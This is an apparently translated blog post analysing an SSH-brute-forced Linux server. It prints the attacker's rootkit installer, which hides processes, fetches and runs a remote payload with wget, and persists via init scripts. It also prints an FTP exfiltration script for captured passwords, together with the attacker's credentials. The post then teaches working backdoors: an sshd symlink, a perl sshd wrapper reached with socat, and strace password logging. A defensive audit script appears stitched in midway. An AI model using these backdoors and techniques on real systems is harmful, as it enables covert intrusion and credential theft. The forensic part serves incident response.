One day a friend's server got hacked through a weak SSH password (yet another perimeter security awareness problem). The anomalous process listing looked like this:

[image: anomalous process listing]

Checking open files with lsof showed these entries under /dev/g:

[image: lsof output]

Then, out of habit, I listed the system commands sorted by modification time: root had already been taken, so the commands had very likely been tampered with. ps and netstat were both tiny, which is not normal at all.

-rwxr-xr-x 1 root root 78 Apr 30  2016 /bin/netstat
strings netstat
#!/bin/sh
for arg in "$*";do
.Fnetstat $arg|grep -v "125.77.31.197";done;exit

So what actually runs is .Fnetstat.
ps was replaced too; it ends up running .Fps.

[root@localhost tmp]# strings /bin/ps
#!/bin/sh
for arg in "$*";do
.Fps $arg|grep -v ".syslogd--system"|grep -v "a8137c40f9"|grep -v "ps"|grep -v "grep"|grep -v "nslookup"|grep -v "mail";done;exit

Three scripts in cron.hourly: mail.sh, mail.py and ssh_deny.sh

[image: cron.hourly listing]

First, ssh_deny.sh:

[image: ssh_deny.sh]

/dev/black.txt records the IPs that failed SSH logins and how many times each failed.

pt is the port sshd listens on.

The script's job is to use iptables to block any IP with more than 3 failed logins.

mail.py is a mail-sending script; it sends /dev/1.txt out.

Two accounts can be seen in the script:

user='success501@163.com', passwd='ff1314'

plus a QQ mailbox, 995999349@qq.com.

Now mail.sh:

#!/bin/bash
S=`date +%s%N | md5sum | head -c 10`
ip=`ifconfig |grep inet| sed -n '1p'|awk '{print $2}'|awk -F ':' '{print $2}'`
pt=`netstat -ntlp | awk '!a[$NF]++ && $NF~/sshd$/{sub (".*:","",$4);print $4}'`
Add=`nslookup www.1024kbs.com|grep "Address: "|awk '{print $2}'`

mv /dev/1.txt /dev/"$ip"+1+"$pt"+"$S".txt;mv /dev/2.txt /dev/"$ip"+2+"$pt"+"$S".txt
curl -u root:ff1314 -T "{/dev/"$ip"+1+"$pt"+"$S".txt,/dev/"$ip"+2+"$pt"+"$S".txt}" ftp://$Add:888
rm -rf /dev/"$ip"+1+"$pt"+"$S".txt /dev/"$ip"+2+"$pt"+"$S".txt

It renames /dev/1.txt and /dev/2.txt, uploads them to an FTP server, then deletes them. My guess is that an SSH backdoor was installed here and 1.txt and 2.txt are the files it logs passwords to, but my friend's colleague had already reinstalled SSH, so that could not be confirmed from this host. So, log in to the FTP server and take a look. Several password files were sitting there:

ftp> open www.1024kbs.com 888
Connected to www.1024kbs.com (118.193.212.86).
220 Welcome to www.Gxnn.com FTP Server!
Name (www.1024kbs.com:root): root
331 Password required for root
Password:
230 User successfully logged in.
Remote system type is Base.
ftp> ls
227 Entering Passive Mode (118,193,212,86,4,88).
150 Opening ASCII mode data connection for directory list.
-rwx------ 1 user group              7 Nov 18 11:52 116.211.17.5+1+22+426e95d58e.txt
-rwx------ 1 user group              6 Nov 18 11:52 116.211.17.5+1+22+9ada1f5efb.txt
-rwx------ 1 user group             32 Nov 18 14:48 116.211.17.5+1+22+b500d80263.txt
-rwx------ 1 user group              7 Nov 18 11:52 116.211.17.5+2+22+426e95d58e.txt
-rwx------ 1 user group              6 Nov 18 11:52 116.211.17.5+2+22+9ada1f5efb.txt
-rwx------ 1 user group             50 Nov 18 14:55 221.229.164.18+1+22+8e46e6b7d4.txt
226 Transfer complete.
ftp>

More SSH credentials from other victims. Searching for 995999349 turned up an article, http://blog.chinaunix.net/uid-25057421-id-5195167.html, which contains the attacker's script:

#! /bin/bash
#chkconfig:12345 90 90
#############################################
#############################################
#############################################
#############################################
#############################################
path=`pwd`
exit0="exit 0"
Fss="/usr/bin/.Fss"
Fps="/usr/bin/.Fps"
Fnet="/usr/bin/.Fnetstat"
LockAngel="/usr/bin/zfgsr"
Fssbak="/usr/bin/dpkgd/ss"
Fpsbak="/usr/bin/dpkgd/ps"
Fnetbak="/usr/bin/dpkgd/netstat"
MyFileAngel="/etc/init.d/.dbus-daemon--system"
PuppetAngel="/usr/bin/.dbus-daemon--system.bak"
allow="/etc/allow.bak"
Fconfig="/sbin/Fconfig.n"
S99="/etc/rc.d/init.d/S99.25000"
if [ ! -f  "$Fconfig" ];then
echo byqinshou 995999349 > $Fconfig
zfgsr +ia $Fconfig >/dev/null 2>&1
fi
Address1=`nslookup www.120kongbao.com|grep "Address: "|awk '{print $2}'`
if [ -z "$Address1" ];then
zfgsr -ia /etc/resolv.conf
echo 'nameserver 114.114.114.114'>/etc/resolv.conf
echo 'nameserver 8.8.8.8'>>/etc/resolv.conf
touch -d "2010-06-7 08:10:30"  /etc/resolv.conf
zfgsr +ia /etc/resolv.conf
fi
Ftempbash=`cat $Fconfig | awk '{print $2}'`   # current script file name
Fbashtemp="/usr/bin/"$Ftempbash # current script path
Fbashname=`date +%s%N | md5sum | head -c 10`
Fbashpath="/usr/bin/"$Fbashname # new script path
if [ $0 != "$Fbashtemp" ];then
pkill $Ftempbash;killall $Ftempbash
zfgsr -ia /usr/bin/$Ftempbash;rm -f /usr/bin/$Ftempbash
zfgsr -ia $PuppetAngel;rm -f $PuppetAngel
fi
# -------------------------------------------------------------
if [ ! -f  "$LockAngel" ];then
zfgsr -ia $LockAngel
rm -rf $LockAngel
cp -f /usr/bin/chattr $LockAngel
cp -f /usr/bin/chattr /usr/bin/.zfgsr
cp -f /usr/bin/.zfgsr $LockAngel
chmod 777 $LockAngel
chmod 777 /usr/bin/.zfgsr
touch -d "2011-06-7 08:10:30"  $LockAngel
touch -d "2011-06-7 08:10:30"  /usr/bin/.zfgsr
rm -rf /usr/bin/chattr
zfgs +ia $LockAngel >/dev/null 2>&1
fi
# delete the original chattr and copy it to /usr/bin/.zfgsr and /usr/bin/zfgsr; /usr/bin/zfgsr sets the a and i attributes so the file cannot be appended to, deleted or modified
if [ -f /usr/sbin/ss ];then
if [ ! -f "$Fss" ];then
if [ ! -f "$Fssbak" ];then
mkdir /usr/bin/dpkgd/
cp -f /usr/sbin/ss $Fssbak
cp -f /usr/sbin/ss $Fss
else
cp -f $Fssbak $Fss
fi
zfgsr -ia /usr/sbin/ss
rm -rf /usr/sbin/ss
echo '#!/bin/sh' > /usr/sbin/ss
echo '.Fss|grep -v "'$Address1'"' >> /usr/sbin/ss
echo 'exit' >> /usr/sbin/ss
chmod 0755 $Fss;chmod 0755 /usr/sbin/ss
zfgsr +ia /usr/sbin/ss >/dev/null 2>&1
zfgsr +ia $Fssbak >/dev/null 2>&1
zfgsr +ia $Fss >/dev/null 2>&1
fi
fi
# replace the ss command
if [ -f /bin/netstat ];then
if [ ! -f "$Fnet" ];then
if [ ! -f "$Fnetbak" ];then
mkdir /usr/bin/dpkgd/
cp -f /bin/netstat $Fnetbak
cp -f /bin/netstat $Fnet
else
cp -f $Fnetbak $Fnet
fi
zfgsr -ia /bin/netstat
rm -rf /bin/netstat
echo '#!/bin/sh' > /bin/netstat
echo 'for arg in "$*";do' >> /bin/netstat
echo '.Fnetstat $arg|grep -v "'$Address1'";done;exit' >> /bin/netstat
chmod 0755 $Fnet;chmod 0755 /bin/netstat
zfgsr +ia /bin/netstat >/dev/null 2>&1
zfgsr +ia $Fnetbak >/dev/null 2>&1
zfgsr +ia $Fnet >/dev/null 2>&1
fi
fi
# replace netstat
if [ -f /bin/ps ];then
if [ ! -f "$Fps" ];then
if [ ! -f "$Fpsbak" ];then
mkdir /usr/bin/dpkgd/
cp -f /bin/ps $Fpsbak
cp -f /bin/ps $Fps
else
cp -f $Fpsbak $Fps
fi
zfgsr -ia /bin/ps
rm -rf /bin/ps
echo '#!/bin/sh' > /bin/ps;echo 'for arg in "$*";do' >> /bin/ps
echo '.Fps $arg|grep -v "'.dbus-daemon--system'"|grep -v "'$Fbashname'"|grep -v "ps"|grep -v "grep";done;exit' >> /bin/ps
chmod 0755 $Fps;chmod 0755 /bin/ps
zfgsr +ia /bin/ps >/dev/null 2>&1
zfgsr +ia $Fpsbak >/dev/null 2>&1
zfgsr +ia $Fps >/dev/null 2>&1
fi
fi
# replace the ps command, hiding ps, grep etc. from its output
if [ ! -f  "$allow" ];then
cp -f /etc/hosts.allow $allow
zfgsr +ia $allow >/dev/null 2>&1
fi
# by qinshou -----------------------------------------------
ExistAngel=`.Fps aux | grep .dbus-daemon--system | grep -v "grep" |wc -l`
if [ $ExistAngel != 1 ];then
zfgsr -ia /usr/bin/.dbus-daemon--system
rm -rf /usr/bin/.dbus-daemon--system
cp -f /usr/bin/.dbus-daemon--system.bak /usr/bin/.dbus-daemon--system
chmod 777 /usr/bin/.dbus-daemon--system
/usr/bin/.dbus-daemon--system
  rm -rf /usr/bin/.dbus-daemon--system
fi
if [ ! -f  "$MyFileAngel" ];then
  zfgs -i /usr/bin/wget
  zfgs -a /usr/bin/wget
chmod 777 /usr/bin/wget
wget -P /etc/ http://www.120kongbao.com:999/1000.exe
zfgs -i $MyFileAngel
zfgs -a $MyFileAngel
rm -rf $MyFileAngel
chmod 777 /etc/1000.exe
mv -f /etc/1000.exe $MyFileAngel
zfgs +i $MyFileAngel
zfgs +a $MyFileAngel
chmod 0 /usr/bin/wget
zfgs +i /usr/bin/wget
zfgs +a /usr/bin/wget
fi
if [ ! -f  "$PuppetAngel" ];then
cp -f $MyFileAngel $PuppetAngel
zfgs +i $PuppetAngel
zfgs +a $PuppetAngel
fi
iptable=`iptables -L INPUT|grep $Address1|awk '{print $1 $4}'`
if [ -z "$iptable" ];then
iptables -I INPUT -s $Address1 -j ACCEPT
else
iptables -D INPUT -s $Address1 -j DROP
fi
# autostart------------------
if [ ! -f  "$S99" ];then
echo "#!/bin/sh" >> $S99
echo "# chkconfig: 12345 90 90" >> $S99
echo "# description: $Ftempbash" >> $S99
echo "### BEGIN INIT INFO" >> $S99
echo "# Provides:	$Ftempbash" >> $S99
echo "# Required-Start:	" >> $S99
echo "# Required-Stop:	" >> $S99
echo "# Default-Start:	1 2 3 4 5" >> $S99
echo "# Default-Stop:	" >> $S99
echo "# Short-Description:	$Ftempbash" >> $S99
echo "### END INIT INFO" >> $S99
echo 'case $1 in' >> $S99
echo "start)" >> $S99
echo "	$Fbashpath" >> $S99
echo "	;;" >> $S99
echo "stop)" >> $S99
echo "	;;" >> $S99
echo "*)" >> $S99
echo "	$Fbashpath" >> $S99
echo "	;;" >> $S99
echo "esac" >> $S99
fi
# by qinshou -----------------------------------------------
zfgsr -ia $Fconfig;zfgsr -ia $0;zfgsr -ia $Fbashpath
sed -i "s|$Ftempbash|$Fbashname|" $Fconfig
zfgsr +ia $Fconfig >/dev/null 2>&1
cp -f $0 $Fbashpath;rm -f $0;chmod 0755 $Fbashpath
# by qinshou -----------------------------------------------
if [ -z "`$S99|grep "$Fbashtemp"`" ]; then
sed -i "s|$Ftempbash|$Fbashname|" $S99
chmod 777 $S99
fi
# by qinshou -----------------------------------------------
zfgsr -ia /usr/bin/chattr;rm -f /usr/bin/chattr
zfgsr -ia /etc/hosts.allow;cp -f $allow /etc/hosts.allow;zfgsr +ia /etc/hosts.allow >/dev/null 2>&1
sleep 1;zfgsr -ia $Fbashpath;chmod 0755 $Fbashpath;nohup $Fbashpath >/dev/null 2>&1 &
# by qinshou -----------------------------------------------
zfgsr -ia /bin/ps;sed -i "s|$Ftempbash|$Fbashname|" /bin/ps
zfgsr -ia /bin/netstat;chmod 0755 /bin/netstat;chmod 0755 /bin/ps
zfgsr +ia /bin/netstat >/dev/null 2>&1
zfgsr +ia /bin/ps >/dev/null 2>&1
# by qinshou -----------------------------------------------
exit


1. After getting a shell on the target, whose firewall imposes no restrictions, the attacker wants to quickly open a reachable SSH port.
Tested on Kali. Root is required.

root@kali-vincent:~# ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337;
ssh root@172.16.100.128 -p 31337
Enter any password.

Check the process:

root@kali-vincent:/tmp# ps axu | grep 31337 | grep -v grep
root 85815 0.0 0.1 55164 2964 ? Ss 12:27 0:00 /tmp/su -oPort=31337

Check the port:

root@kali-vincent:/tmp# netstat -antlp | grep 31337
tcp 0 0 0.0.0.0:31337 0.0.0.0:* LISTEN 85815/su 
tcp6 0 0 :::31337 :::* LISTEN 85815/su

As you can see, this backdoor is very easy to spot.

2. Build an SSH wrapper backdoor. It works better than the first: no extra port is opened, and as long as the target runs the SSH service you can connect remotely.
On the compromised host, run:

[root@localhost ~]# cd /usr/sbin
[root@localhost sbin]# mv sshd ../bin
[root@localhost sbin]# echo '#!/usr/bin/perl' >sshd
[root@localhost sbin]# echo 'exec "/bin/sh" if (getpeername(STDIN) =~ /^..4A/);' >>sshd
[root@localhost sbin]# echo 'exec {"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd
[root@localhost sbin]# chmod u+x sshd
[root@localhost sbin]# /etc/init.d/sshd restart

On your own machine, run:

socat STDIO TCP4:10.18.180.20:22,sourceport=13377

[root@vincenthostname socat-1.4]# ./socat STDIO TCP4:172.16.100.128:22,sourceport=13377

whoami
root

This backdoor is also simple to detect: /usr/sbin/sshd is no longer a binary but a script, and the file is very small.
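One check that covers both the replaced ps/netstat/ss commands found earlier and the sshd backdoors in points 1 and 2, added here as an example (not code from the original post or from the attacker's installer). It assumes the command paths the installer targets (/bin/ps, /bin/netstat, /usr/sbin/ss) plus /usr/sbin/sshd, and that lsattr is available for the attribute check.

```shell
#!/bin/sh
# Added audit example (not from the original post). The installer swapped
# /bin/ps, /bin/netstat and /usr/sbin/ss for tiny shell wrappers around a
# hidden copy (.Fps, .Fnetstat, .Fss), and the sshd backdoors above turn
# /usr/sbin/sshd into a perl script or run a symlinked copy. A genuine
# command is an ELF binary, so the first four bytes decide.

# Print ELF, SCRIPT or OTHER for one file, from its magic bytes.
classify_cmd() {
    magic=$(head -c 4 "$1")
    if [ "$magic" = "$(printf '\177ELF')" ]; then
        echo ELF
    else
        case "$magic" in
            '#!'*) echo SCRIPT ;;
            *)     echo OTHER ;;
        esac
    fi
}

# For a wrapper script, list what it hides: every grep -v "<pattern>".
hidden_patterns() {
    grep -o 'grep -v "[^"]*"' "$1" | sed 's/^grep -v "//; s/"$//'
}

# Check the commands the installer targets plus sshd. Anything that is not
# an ELF binary is reported with its size, the strings it filters out and
# its ext attributes (the installer sets +ia through a renamed chattr, so a
# command root cannot overwrite or delete is itself a signal).
audit_cmds() {
    for f in /bin/ps /bin/netstat /usr/sbin/ss /usr/sbin/sshd; do
        [ -e "$f" ] || continue
        kind=$(classify_cmd "$f")
        size=$(wc -c < "$f" | tr -d ' ')
        printf '%-6s %s (%s bytes)\n' "$kind" "$f" "$size"
        if [ "$kind" != ELF ]; then
            echo "  !! not a binary; output filtered for:"
            hidden_patterns "$f" | sed 's/^/     /'
            lsattr "$f" 2>/dev/null || true
        fi
    done
}

# Run the audit when invoked as: sh audit.sh --audit
if [ "${1:-}" = "--audit" ]; then audit_cmds; fi
```

On the compromised host above this would flag /bin/ps and /bin/netstat as SCRIPT and list the IP and process names their wrappers strip; a symlinked sshd like /tmp/su is not on the path list and is caught by the ps/netstat checks the post already shows.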

3. Logging the SSH client's connection password

[test@CentOS tmp]$ alias ssh='strace -o /tmp/sshpwd.log -e read,write,connect -s2048 ssh'
[test@CentOS tmp]$ grep "read(4" /tmp/sshpwd.log 
read(4, "y", 1) = 1
read(4, "e", 1) = 1
read(4, "s", 1) = 1
read(4, "\n", 1) = 1
read(4, "h", 1) = 1
read(4, "e", 1) = 1
read(4, "h", 1) = 1
read(4, "e", 1) = 1
read(4, "\n", 1) = 1
read(4, "e", 16384) = 1
read(4, "x", 16384) = 1
read(4, "i", 16384) = 1
read(4, "t", 16384) = 1
read(4, "\r", 16384) = 1